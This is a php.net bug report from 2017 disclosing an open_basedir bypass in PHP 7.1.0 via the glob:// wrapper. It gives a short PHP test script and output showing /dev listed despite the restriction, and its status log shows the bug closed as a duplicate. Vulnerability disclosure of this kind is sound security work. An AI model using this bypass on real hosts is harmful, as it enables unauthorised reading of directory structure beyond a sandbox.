|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2017-01-08 23:49 UTC] max at cert dot cx
[2017-01-09 17:29 UTC] leigh@php.net
-Status: Open
+Status: Duplicate
[2017-01-09 17:29 UTC] leigh@php.net
[2017-01-09 18:47 UTC] pollita@php.net
-Assigned To:
+Assigned To: pollita
[2017-01-10 00:17 UTC] pollita@php.net
-Status: Duplicate
+Status: Closed
[2017-01-10 00:17 UTC] pollita@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 10:01:29 2024 UTC |
Description: ------------ open_basedir bypass through glob:// protocol may allow attacker read directory structure # ./php -v PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG ) Copyright (c) 1997-2016 The PHP Group Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies Test script: --------------- <?php if ($dh = opendir($argv[1])) { while (($file = readdir($dh)) !== false) { echo "$file\n"; } closedir($dh); } Expected result: ---------------- Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 Actual result: -------------- # ./php bypass.php "/dev/" Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2 Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2 # ./php bypass.php "glob:///dev/*" MAKEDEV apm apmctl arandom audio audio0 audio1 audio2 audioctl audioctl0 audioctl1 audioctl2 bio bktr0 ... etc